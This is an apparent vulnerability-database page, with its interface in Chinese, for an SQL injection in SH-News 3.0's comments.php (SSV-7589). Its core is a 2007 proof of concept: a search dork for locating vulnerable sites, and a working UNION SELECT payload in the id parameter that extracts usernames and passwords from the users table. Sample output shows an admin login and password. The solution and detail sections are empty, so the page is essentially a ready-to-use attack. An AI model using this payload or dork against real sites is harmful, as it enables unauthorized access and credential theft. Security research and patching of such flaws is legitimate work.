SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability

基本字段

漏洞编号：: SSV-7589

披露/发现时间：: 未知

提交时间：: 2007-12-11

漏洞等级：

漏洞类别：: SQL 注入

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.2KB

                         ########################################################################              #                                                                      #              #    ...:::::SH-News 3.0 SQL Injection Vulnerbility ::::....           #                         ######################################################################## Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 ----------------------------------- dork: Powered by SH-News 3.0 ----------------------------------- vlu: http://site.com/patch/comments.php?id=-1'union%20select%201,2,nick,4,5,password,7%20from%20shnews3_users%20where%20id=1/* ------------------------------------- you can see somting such as: Poster:   admin Posted: 01.01.1970 03:30 z4478ad ############# 'admin' is admin user & 'z4478ad' is admin password -------------------------------------

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

发现/披露了漏洞
2007-12-11 提交了漏洞
2007-12-11 提交更新了 PoC

SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定